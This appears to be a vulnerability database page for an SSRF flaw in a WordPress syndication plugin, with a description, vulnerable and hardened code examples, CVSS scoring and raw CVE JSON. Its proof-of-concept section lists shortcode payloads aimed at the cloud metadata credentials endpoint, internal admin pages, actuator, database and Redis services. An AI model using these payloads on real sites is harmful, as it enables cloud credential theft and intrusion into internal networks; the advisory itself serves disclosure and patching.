Security Vulnerability Report
CVE-2025-12962 CVSS 6.4 MEDIUM

CVE-2025-12962

Published: 2025-11-18 09:15:50
Last Modified: 2026-04-15 00:35:42

Description

The Local Syndication plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5a via the `url` parameter in the `[syndicate_local]` shortcode. This is due to the use of `wp_remote_get()` instead of `wp_safe_remote_get()` which lacks protections against requests to internal/private IP addresses and localhost. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application, which can be used to query and modify information from internal services, scan internal networks, and access resources that should not be accessible from external networks.
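The two request patterns the description contrasts, side by side, as an added illustration that is not the Local Syndication plugin's own code: a shortcode handler that passes its `url` attribute to `wp_remote_get()`, and a hardened handler built on `wp_safe_remote_get()`. The function names, the `example_` prefix, the `example_syndicate_allowed_hosts` filter and the allowlisted host are assumptions.

```php
<?php
// Added illustration, not the plugin's code. Function names, the `example_` prefix,
// the allowlist filter and the host in it are assumed.

// Vulnerable pattern from the advisory: the attribute goes straight to wp_remote_get(),
// which will fetch loopback, link-local (169.254.0.0/16) and RFC 1918 addresses as
// readily as a public host, and any Contributor can place the shortcode in a post.
function example_syndicate_vulnerable( $atts ) {
    $atts     = shortcode_atts( array( 'url' => '' ), $atts, 'syndicate_local' );
    $response = wp_remote_get( $atts['url'] );
    if ( is_wp_error( $response ) ) {
        return '';
    }
    return wp_remote_retrieve_body( $response );
}

// Hardened pattern: wp_safe_remote_get() sets reject_unsafe_urls, so WordPress runs
// wp_http_validate_url() on the URL: http/https only, ports 80/443/8080 only, no
// userinfo, and a resolved host that is not loopback, link-local or RFC 1918 (unless
// the site opts in through the http_request_host_is_external filter). Because the
// request args carry over to redirect hops, each hop is checked the same way.
// A host allowlist, a short timeout and a body-size cap shrink what is left.
function example_syndicate_hardened( $atts ) {
    $atts = shortcode_atts( array( 'url' => '' ), $atts, 'syndicate_local' );
    $url  = esc_url_raw( $atts['url'], array( 'http', 'https' ) );
    if ( '' === $url || false === wp_http_validate_url( $url ) ) {
        return '';
    }
    // Assumed site-specific allowlist of syndication sources, filterable by operators.
    $allowed_hosts = apply_filters( 'example_syndicate_allowed_hosts', array( 'news.example.org' ) );
    if ( ! in_array( wp_parse_url( $url, PHP_URL_HOST ), $allowed_hosts, true ) ) {
        return '';
    }
    $response = wp_safe_remote_get( $url, array(
        'timeout'             => 5,
        'redirection'         => 2,
        'limit_response_size' => 512 * 1024,
    ) );
    if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
        return '';
    }
    // Never echo the remote body unfiltered: the shortcode is placeable by Contributors.
    return wp_kses_post( wp_remote_retrieve_body( $response ) );
}
add_shortcode( 'syndicate_local', 'example_syndicate_hardened' );
```

Swapping `wp_remote_get()` for `wp_safe_remote_get()` is the one-line fix the description points at; the allowlist and output filtering are the additional layers a reviewer would ask for on a shortcode that low-privilege users can place.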

CVSS Details

CVSS Score: 6.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Local Syndication plugin <= 1.5a

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
php
<!-- Basic SSRF PoC to fetch AWS metadata -->
[syndicate_local url='http://169.254.169.254/latest/meta-data/iam/security-credentials/']

<!-- SSRF to scan internal network -->
[syndicate_local url='http://192.168.1.1/admin/login.php']
[syndicate_local url='http://10.0.0.5:8080/actuator/env']

<!-- SSRF to access internal database services -->
[syndicate_local url='http://internal-mysql:3306/']

<!-- SSRF using IPv6 localhost -->
[syndicate_local url='http://[::1]:6379/info']

<!-- WordPress Shortcode PHP PoC for authenticated attackers -->
<?php
// Add malicious shortcode to WordPress post/page as Contributor
function trigger_ssrf_poc($url) {
    // This simulates what the vulnerable plugin does
    $response = wp_remote_get($url); // Vulnerable: no safe check
    if (is_wp_error($response)) {
        return 'Error: ' . $response->get_error_message();
    }
    return wp_remote_retrieve_body($response);
}

// Example attack vectors
$targets = [
    'http://169.254.169.254/latest/meta-data/',   // AWS metadata
    'http://169.254.169.254/latest/user-data/',   // AWS user data
    'http://192.168.1.1/',                        // Internal router
    'http://10.0.0.1:8080/actuator/health',       // Spring Boot actuator
];
?>

References

https://plugins.trac.wordpress.org/browser/local-syndication/tags/1.5/local_syndication.php#L41
https://plugins.trac.wordpress.org/browser/local-syndication/tags/1.5/local_syndication.php#L64
https://www.wordfence.com/threat-intel/vulnerabilities/id/7774cdfd-622a-4608-9efd-273923a0d0aa?source=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12962",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-18T09:15:49.850",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Local Syndication plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5a via the `url` parameter in the `[syndicate_local]` shortcode. This is due to the use of `wp_remote_get()` instead of `wp_safe_remote_get()` which lacks protections against requests to internal/private IP addresses and localhost. This makes it possible for authenticated attackers, with Contributor-level access and above, to make web requests to arbitrary locations originating from the web application, which can be used to query and modify information from internal services, scan internal networks, and access resources that should not be accessible from external networks."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          { "lang": "en", "value": "CWE-918" }
        ]
      }
    ],
    "references": [
      { "url": "https://plugins.trac.wordpress.org/browser/local-syndication/tags/1.5/local_syndication.php#L41", "source": "[email protected]" },
      { "url": "https://plugins.trac.wordpress.org/browser/local-syndication/tags/1.5/local_syndication.php#L64", "source": "[email protected]" },
      { "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7774cdfd-622a-4608-9efd-273923a0d0aa?source=cve", "source": "[email protected]" }
    ]
  }
}